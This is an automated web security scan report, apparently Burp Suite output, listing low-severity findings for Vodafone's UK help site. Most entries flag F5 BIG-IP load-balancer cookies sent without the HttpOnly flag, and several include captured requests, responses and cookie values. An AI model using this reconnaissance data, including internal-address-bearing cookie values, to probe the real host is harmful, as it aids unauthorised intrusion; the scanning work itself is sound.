Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 22635
Content-Type: application/octet-stream
Last-Modified: Mon, 14 Nov 2011 09:45:39 GMT
Accept-Ranges: bytes
ETag: "cdf9a72ab2a2cc1:ae4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:37 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

.PNG
.
...IHDR.............m/v ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..W.IDATx......U.?............$...^.Q....
..
v.~... (X.........i..RBM.4B.........o.........f...7.e...6.owvv...=.s.
...[SNIP]...

4.9. http://help.vodafone.co.uk/system/Device/Devices/home_NokiaN8Black.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Devices/home_NokiaN8Black.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Devices/home_NokiaN8Black.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 44080
Content-Type: application/octet-stream
Last-Modified: Wed, 06 Oct 2010 10:10:51 GMT
Accept-Ranges: bytes
ETag: "5c4172c13e65cb1:11f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

.PNG
.
...IHDR.............m/v ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx... .].U&..s....o.5K.,y..)v<@.&$...R.0Pi.....:.}.PP.B3}..U."@...C. C.Lf...I.e..5.==.y..=S........,K.S..O
...[SNIP]...

4.10. http://help.vodafone.co.uk/system/Device/Devices/home_iPhone4SBlack.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Devices/home_iPhone4SBlack.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Devices/home_iPhone4SBlack.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 34366
Content-Type: application/octet-stream
Last-Modified: Fri, 04 Nov 2011 13:05:52 GMT
Accept-Ranges: bytes
ETag: "93ece57af29acc1:11f8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:37 GMT
Set-Cookie: BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

.PNG
.
...IHDR.............m/v ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx......wu/......^..d.r....m....... $$.. ..5.|>.@....@....b....d..d[.....{...g.....{w.. ..-i....e....s..t.0
...[SNIP]...

4.11. http://help.vodafone.co.uk/system/Device/Manu/topic_billing_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Manu/topic_billing_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=754977034.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Manu/topic_billing_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2803
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:53:08 GMT
Accept-Ranges: bytes
ETag: "fd7243a48117cb1:1127"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=754977034.20480.0000; path=/

.PNG
.
...IHDR...V...x.....()......PLTE...333...333............333..................333333333333333333333333333333333...333333333333333333333333333...333TTU.......... 1.'1......?FN &)n3?_%29BJUUV...
...[SNIP]...

4.12. http://help.vodafone.co.uk/system/Device/Manu/topic_email_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Manu/topic_email_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Manu/topic_email_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1354
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:53:08 GMT
Accept-Ranges: bytes
ETag: "27e858a48117cb1:ae4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:39 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

.PNG
.
...IHDR...~...D.......A.....PLTE......333333...333333333333333333333]..333333333.

. 333333...m.....N.........PP.@@...............>............ .pp]........................``.00/...........
...[SNIP]...

4.13. http://help.vodafone.co.uk/system/Device/Manu/topic_joining_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Manu/topic_joining_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Manu/topic_joining_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2036
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:53:54 GMT
Accept-Ranges: bytes
ETag: "5168d9bf8117cb1:11f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:39 GMT
Set-Cookie: BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

.PNG
.
...IHDR...|...H.....t,Q.....PLTE...BFJ333BFJ...BFJ...333......BFJ.........BFJ......333BFJ333333...BFJBFJ...BFJBFJ...BFJ333.........BFJ333.........333...333333.........333333..................
...[SNIP]...

4.14. http://help.vodafone.co.uk/system/Device/Manu/topic_messaging_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Manu/topic_messaging_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Manu/topic_messaging_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 3820
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:53:54 GMT
Accept-Ranges: bytes
ETag: "3dc9fabf8117cb1:114c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

.PNG
.
...IHDR.......p.......k....PLTE............333......333....................................333...333..................333...333333...333.........333...333333......333...333333333......z(..#
...[SNIP]...

4.15. http://help.vodafone.co.uk/system/Device/Manu/topic_priceplans_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Manu/topic_priceplans_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Manu/topic_priceplans_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2319
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:55:15 GMT
Accept-Ranges: bytes
ETag: "de4bcef8117cb1:fd8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

.PNG
.
...IHDR.......Z......P.z...gPLTE......333.....................333..................333333...333333333333......333......333333..................333...........................................
...[SNIP]...

4.16. http://help.vodafone.co.uk/system/Device/Manu/topic_usingphone_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/Manu/topic_usingphone_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1409288458.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/Manu/topic_usingphone_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 795
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:55:15 GMT
Accept-Ranges: bytes
ETag: "8394cdef8117cb1:b73"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1409288458.20480.0000; path=/

.PNG
.
...IHDR...e...t....../<U....PLTE............333333333333333333333333......333...333333..................333.....................xxx..........]].......::....{{bbb.......OO.pp....@@......q33...
...[SNIP]...

4.17. http://help.vodafone.co.uk/system/Device/manu/team_lee_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/Device/manu/team_lee_2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/Device/manu/team_lee_2.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 109733
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 11:43:51 GMT
Accept-Ranges: bytes
ETag: "397278588017cb1:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

.PNG
.
...IHDR.............d.1.....tEXtSoftware.Adobe ImageReadyq.e<...EIDATx..X{pT.......{..<7Y..$....U.."
......0.vP:>:..T....mgZ....(2...2..0P......yl.a..M.y....{...{.`.!.t....s..n.=..s~.w.w.UUq3
...[SNIP]...

4.18. https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/reset.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/css/selfservice/templates/vodafone/redesign/reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.19. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/articleappearance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/articleappearance.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=704645386.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.20. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/browseTopic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/browseTopic.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.21. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/commonVariables.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/commonVariables.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=671090954.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.22. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=671090954.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.23. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.24. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/main.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/main.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.25. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=771754250.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.26. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=721422602.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.27. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=687868170.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.28. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1409288458.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.29. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=754977034.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.30. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.31. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.32. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.33. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

